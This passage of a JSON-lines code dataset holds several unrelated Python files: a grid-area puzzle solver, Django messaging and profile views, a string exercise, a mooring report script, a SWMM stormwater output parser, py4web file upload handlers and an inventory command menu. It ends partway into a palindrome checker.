self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_toronto.py","file_name":"_toronto.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202006711","text":"def load_data():\n p = 'input.txt'\n input_file = open(p,'r')\n data = input_file.readlines()\n for i,d in enumerate(data):\n data[i] = d.rstrip()\n input_file.close()\n return data\n\ndef get_solution():\n coords= load_data()\n for i,c in enumerate(coords):\n t = c.split(\", \")\n coords[i] = [int(t[0]),int(t[1])]\n max_area = getMaxArea(coords)\n print(max_area[1])\n\ndef getMaxArea(coords):\n max_x,max_y,min_x,min_y = get_boundaries(coords)\n x_bound = [max_x,min_x]\n y_bound = [max_y,min_y]\n areas = {}\n for x in range(min_x,max_x+1):\n for y in range(min_y,max_y+1):\n closest = get_closest_point([x,y],coords)\n t = x,y\n areas[t] = closest\n area_sizes = {}\n for _,coord in areas.items():\n if coord is None:\n continue\n existing_count = 0\n t = coord[0],coord[1]\n if t in area_sizes:\n existing_count = area_sizes[t]\n existing_count += 1\n area_sizes[t] = existing_count\n for coord,closest in areas.items():\n if is_infinite(coord,x_bound,y_bound):\n 
area_sizes[closest] = 0\n sorted_by_value = sorted(area_sizes.items(), key=lambda kv: kv[1], reverse=True)\n return sorted_by_value[0]\n\ndef get_closest_point(c,coords):\n distances = {}\n for cord in coords:\n dist = abs(cord[0]-c[0])+abs(cord[1]-c[1])\n l = cord[0],cord[1]\n distances[l] = dist\n sorted_by_value = sorted(distances.items(), key=lambda kv: kv[1])\n if sorted_by_value[0][1] != sorted_by_value[1][1]:\n return sorted_by_value[0][0]\n return None\n\ndef get_boundaries(coords):\n max_x = float('-inf')\n max_y = float('-inf')\n min_x = float('inf')\n min_y = float('inf')\n for c in coords:\n c_x = c[0]\n c_y = c[1]\n if c_x > max_x:\n max_x = c_x\n if c_x < min_x:\n min_x = c_x\n if c_y > max_y:\n max_y = c_y\n if c_y < min_y:\n min_y = c_y\n return max_x,max_y,min_x,min_y\ndef is_infinite(c,x_bound,y_bound):\n c_x = c[0]\n c_y = c[1]\n if c_x == x_bound[0] or c_x == x_bound[1]:\n return True\n if c_y == y_bound[0] or c_y == y_bound[1]:\n return True \n return False\n\nget_solution()","sub_path":"06/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"524840031","text":"from general.serializers import ProfileEditConstituentSerializer\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom constituent_operations.models import Message\nfrom constituent_operations.serializers import SendMessageSerializer\nfrom rest_framework.views import APIView\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\n\nclass SendMessageMPView(APIView):\n permission_classes = ()\n def post(self, request):\n data = SendMessageSerializer(data= request.data)\n\n data.is_valid(raise_exception=True)\n\n sender = data['sender'].value\n receiver = data['receiver'].value\n message = data['message'].value\n attached_file = data['attached_file'].value\n try:\n sender = User.objects.get(system_id_for_user=sender)\n receiver = User.objects.get(id=receiver)\n\n message = Message.objects.create(\n sender=sender,\n receiver=receiver,\n message=message,\n attached_file=attached_file\n )\n response = {\n \"message\": \"Message has been sent\"\n }\n except Exception as e:\n print(e)\n response = {\n \"message\":\"sorry, something went wrong, try again.\"\n } \n\n return Response(response, status=status.HTTP_200_OK) \n\nclass EditProfileView(APIView):\n permission_classes =()\n def post(self, request, id):\n user = User.objects.get(system_id_for_user=id)\n data =ProfileEditConstituentSerializer(data=request.data)\n\n data.is_valid(raise_exception=True)\n\n\n try:\n\n user.profile_picture = request.data['profile_picture']\n\n user.save()\n\n print(request.data['profile_picture'])\n\n data = {\n \"status\":status.HTTP_200_OK,\n \"message\":\"Profile has been updated.\",\n # \"pic\":user.profile_picture\n }\n return Response(data, status=status.HTTP_200_OK)\n\n \n except Exception as e:\n print(e)\n data = {\n \"status\":status.HTTP_400_BAD_REQUEST,\n \"message\":\"Profile was not updated.\",\n # \"pic\":user.profile_picture\n }\n return Response(data, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n \n\n","sub_path":"general/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2966757","text":"'''\nRepeating Letters\nCreate a function that takes a string and returns a string in which each character is repeated 
once.\nExamples\n\"String\" ➞ \"SSttrriinngg\"\n\n\"Hello World!\" ➞ \"HHeelllloo WWoorrlldd!!\"\n\n\"1234!_ \" ➞ \"11223344!!__ \"\nNotes\nAll test cases contain valid strings. Don't worry about spaces, special characters or numbers. They're all considered valid characters.\n'''\n\ndef double_char(txt):\n new_txt = ''\n for item in txt:\n new_txt += item * 2\n return new_txt\n\nprint(double_char('Hello World!'))\n","sub_path":"Algorithms/Python/edabit-Algorithms/repeating_letters.py","file_name":"repeating_letters.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32831420","text":"#! /usr/local/bin/python3\n# encoding: utf-8\n\n\"\"\"\nThis modules creates text output report based on moorings' latest mdr file\n\"\"\"\n\nprint(\"Content-Type: text/plain\\n\\n\")\n\n### GO TO PROJECT HEAD ###\nif __name__ == \"__main__\": import context\n\n### STANDARD-LIB IMPORTS ###\nimport os\n\n### 3RD-PARTY IMPORTS ###\nNone\n\n### GLIDEROPS IMPORTS ###\nfrom gliderops.util import *\nimport gliderops.dataman.parsers.mdr_parser as mdr_parser\nfrom gliderops.dataman.gmcbutler import find_glider_files\n\n\n## DATA SETUP ##\ndef main():\n srcs = find_glider_files(filename = '??.mdr')\n srcs = sorted([mdr_parser.parse(src)[1] for src in srcs], key = lambda x: x.mtime, reverse= True)\n moor = []\n for src in srcs[:]:\n if (src.station_name(),src.mooring_name()) not in [(mdr.station_name(),mdr.mooring_name()) for mdr in moor] and src.mooring_name() is not None:\n moor.append(src)\n\n rem_station = ''\n lines = []\n for mdr in sorted(moor, key = lambda x: x.platformID):\n if rem_station != mdr.station_name():\n rem_station = mdr.station_name()\n lines.append('{} ({})'.format(rem_station, e2ts(mdr.mtime)))\n\n lines.append(' {} = {}'.format(mdr.mooring_name(),mdr.filename))\n lines.append(' Gap Sum = {} kb'.format(mdr.gap_sum()/10**3))\n lines.append(' Gap Num = {}'.format(mdr.gap_num()))\n lines.append(' Percent Collected = {} %'.format(mdr.percent()))\n lines.append(' Total Collected = {} kb'.format(mdr.collected()/10**3))\n lines.append('')\n\n with open(os.path.join('gliderops','report','output', 'mdr_report.txt'), 'w') as f:\n for line in lines:\n f.write(line + os.linesep)\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"gliderops/report/mdr_report.py","file_name":"mdr_report.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158704429","text":"\"\"\"\nswmmread.py\nRead SWMM input file and create objects for each input category\nAlso read the resulting output file after SWMM is runcp\n2013 Arthur McGarity\nSwarthmore College\nAEM: Modified 11/2015 to include LID categories in input file\n\"\"\"\nimport sys\nimport numpy as np \nimport pandas as pd \n\n#from swmm_objects import *\n\ndef read_inp(swmmInpStr):\n# read SWMM inp file fname into a large string\n# create a list \"section_names\" containing the names of the sections found in the file\n# create a dictionary \"sections\" containing the data lines found in each section keyed by section_name\n# finally, return \"section_names\" and \"sections\"\n# NOTE: the calling program is responsible for parsing the data lines in the sections\n\n# fname = \"Example4_bare_PHL.inp\"\n data = swmmInpStr\n section_names = [] # we will build this list from section names found in the SWMM .inp file\n# remove comment lines and blank lines and identify all section 
names used in the file\n data1 = []\n for line in data:\n line_ns = line.strip() # remove whitespace\n if line_ns.startswith('['):\n section_names.append(line_ns)\n elif line_ns.startswith(';;'): # do not include comment ines\n continue\n elif not line_ns: # do not include blank lines\n continue\n data1.append(line) # data1 is a list containing the unstripped lines of the SWMM .inp file \n# now find all data lines in each section, store each data line as an entry in a section_list\n# then after reading all the data in a section, store the section_list in\n# dictionary sections keyed by the section name\n sections = {} # dictionary to hold all lines in a section, keyed by section_names\n end = False\n for i in range(len(data1)):\n line = data1[i]\n line_ns = line.strip() # remove whitespace\n if line_ns in section_names:\n name = line_ns\n section_list = []\n try:\n next_line = data1[i+1] # look ahead at next line\n except IndexError:\n end = True # end of input file found\n next_line_ns = next_line.strip() # remove whitespace\n if (end or (next_line_ns in section_names)): # we have read the entire section\n sections[name] = section_list # store the list in the dictionary\n else:\n section_list.append(line) # store section data in section_list\n try:\n next_line = data1[i+1] # look ahead at next line\n except IndexError:\n end = True\n next_line_ns = next_line.strip() # remove whitespace\n if (end or (next_line_ns in section_names)):\n sections[name] = section_list #populate the sections dictionary\n# for i in section_names:\n# sys.stdout.write(\"%s\\n\" % i)\n# for j in sections[i]:\n# sys.stdout.write(j) \n return((section_names,sections)) # return the section_names LIST and the sections DICTIONARY (keyed by items in the section_names list)\n\ndef read_outflow_series(fname):\n infile = open(fname,'r')\n data = infile.readlines()\n node_results = \"Node Results\"\n found_outfall = False\n hours = [] #empty lists to be appended with data\n outflows = []\n for line in data:\n if node_results in line: #starting in node results section\n found_outfall = True\n if found_outfall:\n line_list = line.split()\n if len(line_list) > 2:\n time = line_list[0] # get date from list\n if len(time) == 11: #so that only node results section will be recorded\n hours.append(time)\n out = line_list[2] #get outflow from list\n outflows.append(out)\n return (outflows)\n\ndef read_runoff(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Surface ',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n #print(output_list)\n runoff = output_list[3]\n return (runoff)\n\ndef read_evaporation(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Evaporation',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n #print(output_list)\n evaporation = output_list[3]\n return (evaporation)\n\ndef read_infiltration(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Infiltration',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n #print(output_list)\n infiltration = 
output_list[3]\n return (infiltration)\n\ndef read_precipitation(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Total',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n # print(output_list)\n precipitation = output_list[3]\n return (precipitation)\n\ndef read_report(fname, ratio):\n infile = open(fname,'r')\n data = infile.read()\n # find and parse the External Outflow line\n external_flow_index = data.find('External Outflow')\n if external_flow_index >= 0: # The External Outflow line is found\n lineList = data[external_flow_index:].split('\\n',1)\n wordlist = lineList[0].split()\n volume = float(wordlist[4])\n else:\n volume = None\n # find and parse the LID Performance Summary\n lid_start_index = data.find('LID Performance Summary')\n if lid_start_index >= 0: # The LID Performance Summary section is in the output file\n lid_subcatchment_heading_index = data.find('Subcatchment',lid_start_index)\n remaining_lines = data[lid_subcatchment_heading_index:].split('\\n') \n #line_after_section = ' '\n i = 2\n lid_performance = []\n while True:\n if remaining_lines[i].strip() == '': # Blank line found\n break\n lid_performance.append(remaining_lines[i])\n i = i + 1\n lid_dict = {}\n series_dict = {}\n for line in lid_performance:\n this_lid_dict = {}\n labels = ['Total Inflow', 'Evap Loss', 'Infil Loss', 'Surface Outflow', 'Drain Outflow', \n 'Initial Storage', 'Final Storage', 'Continuity Error']\n wordlist = line.split() \n idx = wordlist[0] + ' ' + wordlist[1] # string containing subcatchment name and lid name\n values = wordlist[2:]\n i = 0;\n for label in labels:\n this_lid_dict[label] = float(values[i])\n i += 1\n lid_dict[idx] = this_lid_dict # to be stored in mongo database\n # construct a Pandas dataframe:\n #series_dict[idx] = pd.Series(values, index = labels) \n #lid_report = pd.DataFrame(series_dict)\n else:\n lid_dict = None\n lid_report = None\n # find and parse the Outfall Loading Summary \n outfall_start_index = data.find('Outfall Loading Summary')\n output_start_index = data.find('System',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n peak = float(output_list[3])\n volume = float(output_list[4])\n # peak = None\n runoff = read_runoff(fname)\n evaporation = read_evaporation(fname)\n infiltration = read_infiltration(fname)\n precipitation = read_precipitation(fname)\n \n\n #calculating cso volume\n outflow_values = []\n out = read_outflow_series(fname)\n outflow_values.append(out)\n cso_flow = 0\n hours = 0\n tot_flow = 0\n max_treatment = 3122*ratio\n for i in outflow_values: #out_variables is list within list (though outer list is just one element)\n tot = len(i)\n for j in i: \n if float(i) > max_treatment: #ratio method\n tot_flow += float(i)\n cso = float(i) - max_treatment\n cso_flow += cso \n hours += 1\n tot_volume = tot_flow*900*7.48052 #convert to gallons, and seconds in an hour\n cso_volume = cso_flow*900*7.48052 #for seconds in a hour\n #equiv_rat = cso_volume/tot_volume #equivalency ratio\n treated_volume = tot_volume - cso_volume\n\n return (peak,volume,cso_volume,runoff,evaporation,infiltration,precipitation,lid_dict)\n # peak and volume are strings. 
lid_dict is a dictionary of dicts\n\n","sub_path":"swmm_read_cso.py","file_name":"swmm_read_cso.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194088339","text":"import os, json, uuid, datetime\nfrom py4web import action, request, response, abort, redirect, URL, Field\nfrom .common import db, session, T, cache, authenticated, unauthenticated, auth\nfrom py4web.utils.form import Form, FormStyleBulma, FormStyleDefault\nfrom .settings import APP_NAME, UPLOAD_FOLDER\nfrom pydal.validators import IS_NOT_EMPTY, IS_INT_IN_RANGE, IS_IN_SET, IS_IN_DB\nfrom yatl.helpers import A, I, SPAN, XML, DIV, P, TABLE, THEAD, TR, TD, TBODY, H6, IMG\n\nfrom .atab_utils import sql2table\n\n\ndef get_unique_name(orig_name='', default_len=10):\n if orig_name:\n orig_name = orig_name[:default_len] + '_'\n suffix = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S_\")\n return \"_\".join(['at', suffix]) +orig_name + str(uuid.uuid4())\n\ndef data2file( data, fnm, mode = 'wb' ):\n with open(fnm, mode) as f:\n f.write( data )\n return fnm\n\n@action(\"p4wdownload_file\", method=[\"GET\", \"POST\"])\n@action.uses(session, db, auth, \"p4wdownload_file.html\")\ndef p4wdownload_file():\n tbl = dict(request.query).get('t_', '') \n if not tbl in db.tables:\n return f\"bad table: {tbl}\"\n id_ = dict(request.query).get('id_', 1)\n try:\n id = int(id_)\n except ( ValueError, TypeError) :\n id = 1\n\n\n r = db[tbl](id)\n if r is None:\n return f\"bad id: {id}\"\n\n orig_fnm = r.orig_file_name\n\n fpath = os.path.join( UPLOAD_FOLDER , r.uniq_file_name )\n\n return file2browser ( fpath , orig_fnm )\n\n\ndef file2browser( file_path , orig_fnm = 'orig_fnm' ): \n import mimetypes\n mimetypes.init()\n\n file_content = '';\n\n try:\n with open(file_path, 'rb') as f:\n file_content= f.read()\n except IOError:\n file_content = f\"Error: File {orig_fnm} {file_path} does not appear to exist\"\n\n ext = os.path.splitext( orig_fnm )\n tru_ext = ext[1].lower() if len(ext) and len(ext[1]) else ''\n\n file_type = mimetypes.types_map.get(tru_ext, None)\n view_in_browser =('.pdf','.jpeg','.txt','.jpg','.jpe','.png','.gif','.tif','.tiff','.bmp','.svg','.ico')\n\n response.headers['Content-Type'] = 'application/octet-stream' if file_type is None else file_type\n\n response.headers['Content-disposition'] = 'inline; filename=\\\"%s\"' % ( orig_fnm) \\\n if not file_type is None and tru_ext.endswith( view_in_browser ) \\\n else 'attachment; filename=\\\"%s\"' % ( orig_fnm)\n return file_content\n\n\n@action(\"p4wdelete_file\", method=[\"GET\", \"POST\"])\n@action.uses(session, db, auth, )\n#@action.uses(session, db, auth, \"p4wdelete_file.html\")\ndef p4wdelete_file():\n tbl = dict(request.query).get('t_', '')\n if not tbl in db.tables:\n return f\"bad table: {tbl}\"\n id_ = dict(request.query).get('id_', 0)\n try:\n id = int(id_)\n except ( ValueError, TypeError) :\n return f\"bad id: {id_}\"\n #return f\"{tbl} {id}\"\n\n r = db[tbl](id)\n if r is None:\n return f\"bad id: {id}\"\n\n file_path = os.path.join( UPLOAD_FOLDER , r.uniq_file_name )\n\n if os.path.isfile( file_path ):\n os.remove( file_path )\n\n db(db[tbl].id == id ).delete()\n db.commit()\n redirect(URL('p4wupload_file', vars=dict(t_=tbl, id_=id) ))\n \n\n#---------------------------------------------------------------------------------------------------------\n\nfrom py4web.utils.form import Form, FormStyleBulma, FormStyleDefault\nfrom .settings import APP_NAME, UPLOAD_FOLDER\nfrom 
pydal.validators import IS_NOT_EMPTY, IS_INT_IN_RANGE, IS_IN_SET, IS_IN_DB\n\nfrom .common import flash\n\n@action(\"p4wupload_file\", method=[\"GET\", \"POST\"])\n@action.uses(flash, session, db, T, \"p4wupload_file.html\")\ndef p4wupload_file():\n\n t_id = dict(request.query).get('id_', '0')\n #if t_id != '0': \n # flash.set(f\"deleted id={t_id}\", sanitize=True)\n\n if not os.path.isdir(UPLOAD_FOLDER):\n return f\"bad upload path: {UPLOAD_FOLDER}\"\n\n messages= []\n tbl = 'uploaded_files'\n upload_field = 'image'\n upload_form = Form(\n [\n Field( upload_field, 'upload', requires=IS_NOT_EMPTY(),),\n Field(\"remark\", default='mycomment' ),\n ],\n formstyle=FormStyleDefault,\n )\n\n if upload_form.accepted and hasattr(request, 'files') :\n bottle_class=request.files.get( upload_field, None)\n if bottle_class:\n image_file = bottle_class.raw_filename\n image_content = bottle_class.file.read()\n uniq_file_name = get_unique_name( )\n fnm2 = os.path.join( UPLOAD_FOLDER , uniq_file_name )\n with open(fnm2, 'wb') as f:\n f.write( image_content )\n row = dict( orig_file_name = image_file, uniq_file_name=uniq_file_name, remark=upload_form.vars['remark'] )\n if db[tbl].insert(**db[tbl]._filter_fields(row)):\n db.commit()\n\n elif upload_form.errors:\n messages.append( f\"upload_form has errors: {upload_form.errors}\")\n\n\n hlinks = [\"save\", \"del\"]\n\n links = [\n lambda tx, r_id: A(\n f\"save:[{r_id}]\",\n _title='save file to disk',\n _href=URL(f\"p4wdownload_file\", vars=dict(t_=tx, id_=r_id)),\n ),\n\n lambda tx, r_id: A(\n f\"del:[{r_id}]\",\n _title=\"run p4wdelete_file\",\n _href=URL(f\"p4wdelete_file\", vars=dict(t_=tx, id_=r_id)),\n ),\n\n ]\n\n fld_links = {\n # 'id': lambda tx, xx, r_id: A(\n # f'save[{r_id}]',\n # _title='save file to disk',\n # _href=URL(f\"p4wdownload_file\", vars=dict(t_=tx, x_=xx, id_=r_id)),\n # ),\n 'time': lambda tx, xx, r_id: SPAN( xx.strftime(\"%d.%m.%Y %H:%M:%S\"), _style=\"color:red\" ), \n }\n\n mygrid = sql2table( tbl, db, links=links, hlinks=hlinks, fld_links=fld_links, items_on_page = 2, caller=\"p4wupload_file\", page_d=dict(request.query))\n return dict( messages=messages, upload_form=upload_form, mygrid=mygrid ) \n\n#---------------------------------------------------------------------------------------------------------\n","sub_path":"volt/upload_utils.py","file_name":"upload_utils.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"47772794","text":"# import info_show\r\n# import data_update as update\r\n# import crt_inv_cmd as crt\r\n# import statis_fcst as fcst\r\n# import mi\r\n# import re\r\nimport public_function as pb_fct\r\n\r\n\r\nclass SystemIndex:\r\n bu_name = None\r\n user_name = None\r\n bu_name_lst = {\r\n \"Jeffrey\": \"TU\",\r\n \"Cecilia\": \"CMFT\",\r\n \"Yuanzhi\": \"PT\",\r\n \"Raymond\": \"JT\",\r\n \"Doris\": \"Spine\",\r\n \"Tina\": \"MT\"\r\n }\r\n \r\n def __init__(self):\r\n pass\r\n\r\n # command list\r\n # code - show the information by code\r\n # h5, hierarchy, group - show the information by h5, including whole bu\r\n # update - update data, including master data and sales & inventory data\r\n # export - export to excel file\r\n # hospital_sales - show the chart of hospital sales\r\n # 000 or click - turn to oneclick page\r\n # mi - turn to mi page\r\n # help - help page\r\n # 888 or forecast or fcst - generate statistical forecast\r\n # switch - switch the user\r\n # exit - quit the system\r\n\r\n def 
_display_general_command_mode(self):\r\n print(\"=== Please wait a few seconds for module loading ===\")\r\n import data_display\r\n # Get cmd_code and cmd_extension with split character \"-\"\r\n cmd_info_index = data_display.DataDisplay(self.__class__.bu_name, self.__class__.user_name)\r\n cmd_code = input(\"cmd >> \").strip().upper()\r\n # define different cmd code by cmd_code\r\n while cmd_code not in ['EXIT', 'SWITCH']:\r\n if cmd_code in [\"915\", 'CONSOLIDATE', 'CON']:\r\n from data_update import MasterDataConsolidation\r\n data_input = MasterDataConsolidation(self.__class__.bu_name)\r\n data_input.master_data_update_entrance()\r\n elif cmd_code == \"500\":\r\n from hospital_sales_calculation import HospitalSalesCalculation\r\n hospital_sale_review = HospitalSalesCalculation(self.__class__.bu_name)\r\n hospital_sale_review.start_generate_AIO_chart()\r\n elif cmd_code in [\"000\", 'ONECLICK', 'CLICK', 'K']:\r\n import crt_inv_cmd as crt\r\n cmd_crt_inv = crt.CurrentInventoryMenu(self.__class__.bu_name)\r\n cmd_crt_inv.crt_inv_entrance()\r\n elif cmd_code in ['777', 'SNOP']:\r\n import snop_export_v2 as snop\r\n data_export = snop.SNOPExportEntrance(self.__class__.bu_name)\r\n data_export.start_snop_export()\r\n elif cmd_code in [\"888\", 'FCST', 'FORECAST']:\r\n import statis_fcst as fcst\r\n forecast_view = fcst.GetStatisticalForecast(self.__class__.bu_name)\r\n forecast_view.get_forecast_entrance()\r\n elif cmd_code in [\"999\", 'MI']:\r\n import mi\r\n add_mi = mi.MI(self.__class__.bu_name)\r\n add_mi.mi_start()\r\n elif cmd_code in [\"111\", 'HELP']:\r\n cmd_info_index.show_command_list()\r\n elif cmd_code in ['CODE', 'C']:\r\n self._display_code_command_mode()\r\n elif cmd_code in ['H5', 'HIERARCHY', 'GROUP', 'H']:\r\n self._display_h5_command_mode()\r\n elif cmd_code in ['UPDATE', 'U']:\r\n self._display_update_command_mode()\r\n elif cmd_code in ['BU_UPDATE', 'BMU']:\r\n self._display_bu_master_data_update_command_mode()\r\n elif cmd_code in ['PUBLIC_UPDATE', 'PMU']:\r\n self._display_public_master_data_update_command_mode()\r\n else:\r\n print(\"!!ERROR: Wrong CMD code. Plz input right cmd code, or input exit to quit.\")\r\n cmd_code = input(\"cmd >> \").strip().upper()\r\n if cmd_code == \"SWITCH\":\r\n self.__class__.bu_name, self.__class__.user_name = None, None\r\n self.login_control()\r\n elif cmd_code == 'EXIT':\r\n pb_fct.display_ascii_graph(\"goodbye\")\r\n else:\r\n pass\r\n\r\n def _display_code_command_mode(self):\r\n from data_display import CodeDataDisplay\r\n code_info_display = CodeDataDisplay(self.__class__.bu_name, self.__class__.user_name)\r\n cmd_input = input('cmd >> code_display >> ').replace(' ', '').upper().split('-')\r\n code_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n while code_input.upper() not in ['RETURN', 'EXIT']:\r\n if not code_input:\r\n pass\r\n elif cmd_extension == 'X':\r\n code_info_display.show_code_all_info(code_input)\r\n elif cmd_extension == 'G':\r\n code_info_display.show_code_chart(code_input)\r\n else:\r\n print('!! 
Warning - Wrong extension, please input again')\r\n # continue to show the command list\r\n cmd_input = input('cmd >> code_display >> ').replace(' ', '').upper().split('-')\r\n code_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n\r\n def _display_h5_command_mode(self):\r\n from data_display import HierarchyDataDisplay\r\n h5_info_display = HierarchyDataDisplay(self.__class__.bu_name, self.__class__.user_name)\r\n cmd_input = input('cmd >> hierarchy5_display >> ').replace(' ', '').upper().split('-')\r\n h5_name_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n mth_qty = min(int(cmd_input[2]), 24) if len(cmd_input) > 2 and cmd_input[2].isdecimal() else 12\r\n while h5_name_input.upper() not in ['RETURN', 'EXIT']:\r\n if not h5_name_input:\r\n pass\r\n elif cmd_extension == 'X':\r\n h5_info_display.show_h5_all_info(h5_name_input, mth_qty)\r\n elif cmd_extension == 'G':\r\n h5_info_display.show_h5_chart(h5_name_input)\r\n else:\r\n print('!! Warning - Wrong extension, please input again')\r\n # continue to show the command list\r\n cmd_input = input('cmd >> hierarchy5_display >> ').replace(' ', '').upper().split('-')\r\n h5_name_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n mth_qty = min(int(cmd_input[2]), 24) if len(cmd_input) > 2 and cmd_input[2].isdecimal() else 12\r\n\r\n def _display_update_command_mode(self):\r\n from data_update import MonthlyUpdate\r\n monthly_update = MonthlyUpdate(self.__class__.bu_name)\r\n cmd_input = input('cmd >> data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n while update_item.upper() not in ['RETURN', 'EXIT']:\r\n if update_item in ['GTS', 'G']:\r\n monthly_update.update_sales('GTS')\r\n elif update_item in ['LPSALES', 'L', 'N', 'NED', 'LP', 'NEDSALES']:\r\n monthly_update.update_sales('LPSales')\r\n elif update_item in ['IMS', 'I']:\r\n monthly_update.update_sales('IMS')\r\n elif update_item in ['JNJINV', 'JI', 'JNJ_INV']:\r\n monthly_update.update_jnj_inventory()\r\n elif update_item in ['NEDINV', 'NI', 'NED_INV', 'LPINV', 'LI']:\r\n monthly_update.update_lp_inv()\r\n elif update_item in ['FCST', 'F', 'FORECAST']:\r\n monthly_update.update_final_forecast()\r\n elif update_item in ['ESO', 'E']:\r\n monthly_update.update_eso()\r\n else:\r\n print('!! 
Warning - Wrong extension, please input again')\r\n cmd_input = input('cmd >> data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n\r\n def _display_bu_master_data_update_command_mode(self):\r\n from data_update import MasterDataUpdate\r\n master_data_update = MasterDataUpdate(self.__class__.bu_name)\r\n print(\"-- Import BU Level Master Data for %s -- \" % self.__class__.bu_name)\r\n print(\"Please Choose Master Data Type (1 - PM_List, 2 - SAP_Price, 3 - Phoenix_List, 4 - ROP_Setting, \"\r\n \"5 - ABC Ranking, 6 - NPI List)\")\r\n dict_master_data = {'1': 'PM_List', '3': 'Phoenix_List', '4': 'ROP_Setting', '6': 'NPI_List'}\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n while update_item.upper() not in ['RETURN', 'EXIT']:\r\n data_type = ''\r\n if update_item in dict_master_data:\r\n data_type = dict_master_data[update_item]\r\n elif update_item == '2':\r\n master_data_update.import_sap_price_excel()\r\n print(\"SAP_Price is imported\")\r\n elif update_item == '5':\r\n master_data_update.generate_tu_abc_ranking()\r\n print('ABC Ranking Template Done.~')\r\n else:\r\n print(\"!!Wrong code, please try again!\")\r\n # if the data type is assigned, update the related data\r\n if data_type:\r\n master_data_update.import_bu_master_data(data_type)\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n\r\n def _display_public_master_data_update_command_mode(self):\r\n from data_update import MasterDataUpdate\r\n public_master_data_update = MasterDataUpdate(self.__class__.bu_name)\r\n print(\"-- Import Public Master Data -- \")\r\n print(\"Please Choose Master Data Type (1 - Material Master, 2 - RAG Report, 3 - GTIN)\")\r\n dict_public_master_data = {'1': \"MATERIAL_MASTER\", '2': \"RAG_Report\", '3': 'GTIN'}\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n while update_item.upper() not in ['RETURN', 'EXIT']:\r\n if update_item in dict_public_master_data:\r\n data_type = dict_public_master_data[update_item]\r\n public_master_data_update.import_public_master_data(data_type)\r\n else:\r\n print(\"!!Wrong code, please try again!\")\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n\r\n def login_control(self):\r\n name = input(\"Please input your name: \")\r\n if name.capitalize() in self.bu_name_lst:\r\n self.__class__.user_name = name.capitalize()\r\n self.__class__.bu_name = self.bu_name_lst[self.__class__.user_name]\r\n pb_fct.display_ascii_graph(\"welcome\")\r\n print(\"** Welcome %s. 
Now you are handling %s **\" % (self.__class__.user_name, self.__class__.bu_name))\r\n self._display_general_command_mode()\r\n else:\r\n print(\"!!Error: wrong user name, please restart the program.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n new_login = SystemIndex()\r\n new_login.login_control()\r\n\r\n # 方法2获取所有的代码信息并导出到excel\r\n # result = info_check.generate_code_detail_v2()\r\n # info_check.export_to_excel(result)\r\n # 方法1获取所有的代码信息并导出到excel\r\n # result = info_check.generate_code_detail()\r\n # info_check.export_to_excel(result)\r\n","sub_path":"antares/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"264277967","text":"#=================================\n# importing modules\n#=================================\nimport stack\n\n\n#=================================\n# Welcome\n#=================================\nprint(\"This program can determine if a given string is a palindrome\\n\")\nprint(\"(Enter return to exit)\")\n\n#=================================\n# init\n#=================================\nchar_stack = stack.getStack()\nempty_string = ''\n\n#=================================\n# get string from user\n#=================================\nchars = input(\"Enter string to check: \")\n\nwhile chars 